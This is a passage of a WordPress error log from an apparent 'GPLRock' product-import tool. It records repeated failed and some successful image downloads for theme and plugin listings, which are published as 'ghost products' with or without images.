gecko-powerful-ajax-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:30 UTC] GPLRock: Image download failed for product gecko-powerful-ajax-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gecko---powerful-ajax-woocommerce-theme-8288.webp for product gecko-powerful-ajax-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:32 UTC] GPLRock WARNING: Image download failed for product gecko-powerful-ajax-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/gecko---powerful-ajax-woocommerce-theme-8288.webp [05-Apr-2026 04:55:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gecko-powerful-ajax-woocommerce-theme [05-Apr-2026 04:55:32 UTC] GPLRock: Image download failed for product peggi-multipurpose-children-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:34 UTC] GPLRock: Image download failed for product peggi-multipurpose-children-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/peggi---multipurpose-children-wordpress-theme-2352.webp for product peggi-multipurpose-children-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:36 UTC] GPLRock: Image download failed for product peggi-multipurpose-children-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:38 UTC] GPLRock: Image download failed for product peggi-multipurpose-children-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/peggi---multipurpose-children-wordpress-theme-2352.webp for product peggi-multipurpose-children-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:40 UTC] GPLRock WARNING: Image download failed for product peggi-multipurpose-children-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/peggi---multipurpose-children-wordpress-theme-2352.webp [05-Apr-2026 04:55:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: peggi-multipurpose-children-wordpress-theme [05-Apr-2026 04:55:41 UTC] GPLRock: Image download failed for product ecologist-environmental-ecology-and-recycling-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:43 UTC] GPLRock: Image download failed for product ecologist-environmental-ecology-and-recycling-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecologist---environmental-ecology-and-recycling-wordpress-theme-10869.webp for product ecologist-environmental-ecology-and-recycling-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:45 UTC] GPLRock: Image download failed for product ecologist-environmental-ecology-and-recycling-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:47 UTC] GPLRock: Image download failed for product ecologist-environmental-ecology-and-recycling-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecologist---environmental-ecology-and-recycling-wordpress-theme-10869.webp for product ecologist-environmental-ecology-and-recycling-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:49 UTC] GPLRock WARNING: Image download failed for product ecologist-environmental-ecology-and-recycling-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ecologist---environmental-ecology-and-recycling-wordpress-theme-10869.webp [05-Apr-2026 04:55:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecologist-environmental-ecology-and-recycling-wordpress-theme [05-Apr-2026 04:55:49 UTC] GPLRock: Image download failed for product dandelion-pro-react-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:51 UTC] GPLRock: Image download failed for product dandelion-pro-react-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dandelion-pro---react-admin-dashboard-template-28563.webp for product dandelion-pro-react-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:54 UTC] GPLRock: Image download failed for product dandelion-pro-react-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:56 UTC] GPLRock: Image download failed for product dandelion-pro-react-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:55:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dandelion-pro---react-admin-dashboard-template-28563.webp for product dandelion-pro-react-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:55:58 UTC] GPLRock WARNING: Image download failed for product dandelion-pro-react-admin-dashboard-template. URL: https://meldwp.com/wp-content/uploads/dandelion-pro---react-admin-dashboard-template-28563.webp [05-Apr-2026 04:55:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dandelion-pro-react-admin-dashboard-template [05-Apr-2026 04:55:58 UTC] GPLRock: Image download failed for product bellaria-a-delicious-cakes-and-bakery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:00 UTC] GPLRock: Image download failed for product bellaria-a-delicious-cakes-and-bakery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bellaria---a-delicious-cakes-and-bakery-wordpress-theme-26314.webp for product bellaria-a-delicious-cakes-and-bakery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:02 UTC] GPLRock: Image download failed for product bellaria-a-delicious-cakes-and-bakery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:04 UTC] GPLRock: Image download failed for product bellaria-a-delicious-cakes-and-bakery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bellaria---a-delicious-cakes-and-bakery-wordpress-theme-26314.webp for product bellaria-a-delicious-cakes-and-bakery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:07 UTC] GPLRock WARNING: Image download failed for product bellaria-a-delicious-cakes-and-bakery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bellaria---a-delicious-cakes-and-bakery-wordpress-theme-26314.webp [05-Apr-2026 04:56:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bellaria-a-delicious-cakes-and-bakery-wordpress-theme [05-Apr-2026 04:56:07 UTC] GPLRock: Image download failed for product industryo-construction (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:09 UTC] GPLRock: Image download failed for product industryo-construction (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/industryo---construction-11835.webp for product industryo-construction after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:11 UTC] GPLRock: Image download failed for product industryo-construction (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:13 UTC] GPLRock: Image download failed for product industryo-construction (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/industryo---construction-11835.webp for product industryo-construction after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:15 UTC] GPLRock WARNING: Image download failed for product industryo-construction. URL: https://meldwp.com/wp-content/uploads/industryo---construction-11835.webp [05-Apr-2026 04:56:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: industryo-construction [05-Apr-2026 04:56:26 UTC] GPLRock: Image download failed for product woocommerce-side-cart-slide-in-cart-with-ajax-mini-cart-features (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:28 UTC] GPLRock: Image download failed for product woocommerce-side-cart-slide-in-cart-with-ajax-mini-cart-features (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-side-cart--slide-in-cart-with-ajax--mini-cart-features-26728.webp for product woocommerce-side-cart-slide-in-cart-with-ajax-mini-cart-features after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:30 UTC] GPLRock: Image download failed for product woocommerce-side-cart-slide-in-cart-with-ajax-mini-cart-features (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:32 UTC] GPLRock: Image download failed for product woocommerce-side-cart-slide-in-cart-with-ajax-mini-cart-features (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-side-cart--slide-in-cart-with-ajax--mini-cart-features-26728.webp for product woocommerce-side-cart-slide-in-cart-with-ajax-mini-cart-features after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:34 UTC] GPLRock WARNING: Image download failed for product woocommerce-side-cart-slide-in-cart-with-ajax-mini-cart-features. URL: https://meldwp.com/wp-content/uploads/woocommerce-side-cart--slide-in-cart-with-ajax--mini-cart-features-26728.webp [05-Apr-2026 04:56:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-side-cart-slide-in-cart-with-ajax-mini-cart-features [05-Apr-2026 04:56:35 UTC] GPLRock: Image download failed for product portfolio-minimal-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:37 UTC] GPLRock: Image download failed for product portfolio-minimal-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/portfolio-minimal-for-visual-composer-17966.webp for product portfolio-minimal-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:39 UTC] GPLRock: Image download failed for product portfolio-minimal-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:41 UTC] GPLRock: Image download failed for product portfolio-minimal-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/portfolio-minimal-for-visual-composer-17966.webp for product portfolio-minimal-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:43 UTC] GPLRock WARNING: Image download failed for product portfolio-minimal-for-visual-composer. URL: https://meldwp.com/wp-content/uploads/portfolio-minimal-for-visual-composer-17966.webp [05-Apr-2026 04:56:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: portfolio-minimal-for-visual-composer [05-Apr-2026 04:56:43 UTC] GPLRock: Image download failed for product faq-revolution-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:45 UTC] GPLRock: Image download failed for product faq-revolution-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/faq-revolution---wordpress-plugin-6986.webp for product faq-revolution-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:47 UTC] GPLRock: Image download failed for product faq-revolution-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:50 UTC] GPLRock: Image download failed for product faq-revolution-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/faq-revolution---wordpress-plugin-6986.webp for product faq-revolution-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:52 UTC] GPLRock WARNING: Image download failed for product faq-revolution-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/faq-revolution---wordpress-plugin-6986.webp [05-Apr-2026 04:56:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: faq-revolution-wordpress-plugin [05-Apr-2026 04:56:52 UTC] GPLRock: Image download failed for product dokan-integrate-design-launcher-addon-for-lumise-product-designer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:54 UTC] GPLRock: Image download failed for product dokan-integrate-design-launcher-addon-for-lumise-product-designer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dokan-integrate--design-launcher-addon-for-lumise-product-designer-29931.webp for product dokan-integrate-design-launcher-addon-for-lumise-product-designer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:56:56 UTC] GPLRock: Image download failed for product dokan-integrate-design-launcher-addon-for-lumise-product-designer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:56:58 UTC] GPLRock: Image download failed for product dokan-integrate-design-launcher-addon-for-lumise-product-designer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dokan-integrate--design-launcher-addon-for-lumise-product-designer-29931.webp for product dokan-integrate-design-launcher-addon-for-lumise-product-designer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:00 UTC] GPLRock WARNING: Image download failed for product dokan-integrate-design-launcher-addon-for-lumise-product-designer. URL: https://meldwp.com/wp-content/uploads/dokan-integrate--design-launcher-addon-for-lumise-product-designer-29931.webp [05-Apr-2026 04:57:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dokan-integrate-design-launcher-addon-for-lumise-product-designer [05-Apr-2026 04:57:00 UTC] GPLRock: Image download failed for product woocommerce-terms-conditions-popup-accept-terms-before-checkout (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:03 UTC] GPLRock: Image download failed for product woocommerce-terms-conditions-popup-accept-terms-before-checkout (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-terms--conditions-popup--accept-terms-before-checkout-28376.webp for product woocommerce-terms-conditions-popup-accept-terms-before-checkout after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:05 UTC] GPLRock: Image download failed for product woocommerce-terms-conditions-popup-accept-terms-before-checkout (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:07 UTC] GPLRock: Image download failed for product woocommerce-terms-conditions-popup-accept-terms-before-checkout (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-terms--conditions-popup--accept-terms-before-checkout-28376.webp for product woocommerce-terms-conditions-popup-accept-terms-before-checkout after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:09 UTC] GPLRock WARNING: Image download failed for product woocommerce-terms-conditions-popup-accept-terms-before-checkout. URL: https://meldwp.com/wp-content/uploads/woocommerce-terms--conditions-popup--accept-terms-before-checkout-28376.webp [05-Apr-2026 04:57:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-terms-conditions-popup-accept-terms-before-checkout [05-Apr-2026 04:57:10 UTC] GPLRock: Image downloaded successfully for product responsive-html5-audio-player-pro-with-playlist (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9dc9fbe1.webp [05-Apr-2026 04:57:10 UTC] GPLRock: Using pre-downloaded image for product responsive-html5-audio-player-pro-with-playlist: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9dc9fbe1.webp [05-Apr-2026 04:57:10 UTC] GPLRock: Ghost product published with image - Product ID: responsive-html5-audio-player-pro-with-playlist [05-Apr-2026 04:57:10 UTC] GPLRock: Image download failed for product instagram-feed-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:12 UTC] GPLRock: Image download failed for product instagram-feed-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instagram-feed-for-elementor-25484.webp for product instagram-feed-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:14 UTC] GPLRock: Image download failed for product instagram-feed-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:16 UTC] GPLRock: Image download failed for product instagram-feed-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instagram-feed-for-elementor-25484.webp for product instagram-feed-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:18 UTC] GPLRock WARNING: Image download failed for product instagram-feed-for-elementor. URL: https://meldwp.com/wp-content/uploads/instagram-feed-for-elementor-25484.webp [05-Apr-2026 04:57:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: instagram-feed-for-elementor [05-Apr-2026 04:57:19 UTC] GPLRock: Image download failed for product woocommerce-webar-augmented-reality-product (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:21 UTC] GPLRock: Image download failed for product woocommerce-webar-augmented-reality-product (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-webar-augmented-reality-product-714.webp for product woocommerce-webar-augmented-reality-product after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:23 UTC] GPLRock: Image download failed for product woocommerce-webar-augmented-reality-product (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:25 UTC] GPLRock: Image download failed for product woocommerce-webar-augmented-reality-product (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-webar-augmented-reality-product-714.webp for product woocommerce-webar-augmented-reality-product after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:27 UTC] GPLRock WARNING: Image download failed for product woocommerce-webar-augmented-reality-product. URL: https://meldwp.com/wp-content/uploads/woocommerce-webar-augmented-reality-product-714.webp [05-Apr-2026 04:57:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-webar-augmented-reality-product [05-Apr-2026 04:57:27 UTC] GPLRock: Image downloaded successfully for product smart-product-review-for-woocommerce-all-in-one-review-pack-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5ee004d.webp [05-Apr-2026 04:57:27 UTC] GPLRock: Using pre-downloaded image for product smart-product-review-for-woocommerce-all-in-one-review-pack-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5ee004d.webp [05-Apr-2026 04:57:27 UTC] GPLRock: Ghost product published with image - Product ID: smart-product-review-for-woocommerce-all-in-one-review-pack-for-woocommerce [05-Apr-2026 04:57:27 UTC] GPLRock: Image download failed for product bookly-deposit-payments-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:30 UTC] GPLRock: Image download failed for product bookly-deposit-payments-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-deposit-payments-add-on-2968.webp for product bookly-deposit-payments-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:32 UTC] GPLRock: Image download failed for product bookly-deposit-payments-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:34 UTC] GPLRock: Image download failed for product bookly-deposit-payments-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:57:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-deposit-payments-add-on-2968.webp for product bookly-deposit-payments-add-on after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:57:36 UTC] GPLRock WARNING: Image download failed for product bookly-deposit-payments-add-on. URL: https://meldwp.com/wp-content/uploads/bookly-deposit-payments-add-on-2968.webp [05-Apr-2026 04:57:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookly-deposit-payments-add-on [05-Apr-2026 04:58:15 UTC] GPLRock: Image downloaded successfully for product moving-service-local-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5ac0f2a.webp [05-Apr-2026 04:58:15 UTC] GPLRock: Using pre-downloaded image for product moving-service-local-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5ac0f2a.webp [05-Apr-2026 04:58:15 UTC] GPLRock: Ghost product published with image - Product ID: moving-service-local-business-elementor-template-kit [05-Apr-2026 04:58:16 UTC] GPLRock: Image downloaded successfully for product motret-digital-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0a381d4.webp [05-Apr-2026 04:58:16 UTC] GPLRock: Using pre-downloaded image for product motret-digital-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f0a381d4.webp [05-Apr-2026 04:58:16 UTC] GPLRock: Ghost product published with image - Product ID: motret-digital-marketing-elementor-template-kit [05-Apr-2026 04:58:17 UTC] GPLRock: Image downloaded successfully for product moony-finance-investment-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a323ee8c.webp [05-Apr-2026 04:58:18 UTC] GPLRock: Using pre-downloaded image for product moony-finance-investment-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a323ee8c.webp [05-Apr-2026 04:58:18 UTC] GPLRock: Ghost product published with image - Product ID: moony-finance-investment-elementor-template-kit [05-Apr-2026 04:58:19 UTC] GPLRock: Image downloaded successfully for product moneer-cryptocurrency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-64fee20c.jpg [05-Apr-2026 04:58:19 UTC] GPLRock: Using pre-downloaded image for product moneer-cryptocurrency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-64fee20c.jpg [05-Apr-2026 04:58:19 UTC] GPLRock: Ghost product published with image - Product ID: moneer-cryptocurrency-elementor-template-kit [05-Apr-2026 04:58:21 UTC] GPLRock: Image downloaded successfully for product milcow-dairy-farm-eco-milk-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d555515.jpg [05-Apr-2026 04:58:21 UTC] GPLRock: Using pre-downloaded image for product milcow-dairy-farm-eco-milk-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d555515.jpg [05-Apr-2026 04:58:21 UTC] GPLRock: Ghost product published with image - Product ID: milcow-dairy-farm-eco-milk-elementor-template-kit [05-Apr-2026 04:58:22 UTC] GPLRock: Image downloaded successfully for product mediq-health-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab95a39f.webp [05-Apr-2026 04:58:22 UTC] GPLRock: Using pre-downloaded image for product mediq-health-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ab95a39f.webp [05-Apr-2026 04:58:22 UTC] GPLRock: Ghost product published with image - Product ID: mediq-health-medical-elementor-template-kit [05-Apr-2026 04:58:24 UTC] GPLRock: Image downloaded successfully for product mediphar-pharmacy-medical-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-11cd0007.jpg [05-Apr-2026 04:58:24 UTC] GPLRock: Using pre-downloaded image for product mediphar-pharmacy-medical-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-11cd0007.jpg [05-Apr-2026 04:58:24 UTC] GPLRock: Ghost product published with image - Product ID: mediphar-pharmacy-medical-elementor-template-kit [05-Apr-2026 04:58:26 UTC] GPLRock: Image downloaded successfully for product matar-mental-health-therapy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-976ab18b.jpg [05-Apr-2026 04:58:26 UTC] GPLRock: Using pre-downloaded image for product matar-mental-health-therapy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-976ab18b.jpg [05-Apr-2026 04:58:26 UTC] GPLRock: Ghost product published with image - Product ID: matar-mental-health-therapy-elementor-template-kit [05-Apr-2026 04:58:27 UTC] GPLRock: Image downloaded successfully for product masterykit-business-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b4b10913.webp [05-Apr-2026 04:58:27 UTC] GPLRock: Using pre-downloaded image for product masterykit-business-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b4b10913.webp [05-Apr-2026 04:58:27 UTC] GPLRock: Ghost product published with image - Product ID: masterykit-business-coach-elementor-template-kit [05-Apr-2026 04:58:29 UTC] GPLRock: Image downloaded successfully for product maccho-gentlemen-barbershop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-12a2ed2b.webp [05-Apr-2026 04:58:29 UTC] GPLRock: Using pre-downloaded image for product maccho-gentlemen-barbershop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-12a2ed2b.webp [05-Apr-2026 04:58:29 UTC] GPLRock: Ghost product published with image - Product ID: maccho-gentlemen-barbershop-elementor-template-kit [05-Apr-2026 04:59:48 UTC] GPLRock: Image download failed for product constructo-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:59:50 UTC] GPLRock: Image download failed for product constructo-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:59:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/constructo---construction-wordpress-theme-10357.webp for product constructo-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:59:52 UTC] GPLRock: Image download failed for product constructo-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:59:54 UTC] GPLRock: Image download failed for product constructo-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:59:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/constructo---construction-wordpress-theme-10357.webp for product constructo-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:59:56 UTC] GPLRock WARNING: Image download failed for product constructo-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/constructo---construction-wordpress-theme-10357.webp [05-Apr-2026 04:59:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: constructo-construction-wordpress-theme [05-Apr-2026 04:59:57 UTC] GPLRock: Image download failed for product tactile-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:59:59 UTC] GPLRock: Image download failed for product tactile-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tactile---multipurpose-wordpress-theme-12167.webp for product tactile-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:00:01 UTC] GPLRock: Image download failed for product tactile-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:03 UTC] GPLRock: Image download failed for product tactile-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:00:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tactile---multipurpose-wordpress-theme-12167.webp for product tactile-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 521, Error: [05-Apr-2026 05:00:05 UTC] GPLRock WARNING: Image download failed for product tactile-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tactile---multipurpose-wordpress-theme-12167.webp [05-Apr-2026 05:00:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tactile-multipurpose-wordpress-theme [05-Apr-2026 05:00:05 UTC] GPLRock: Image 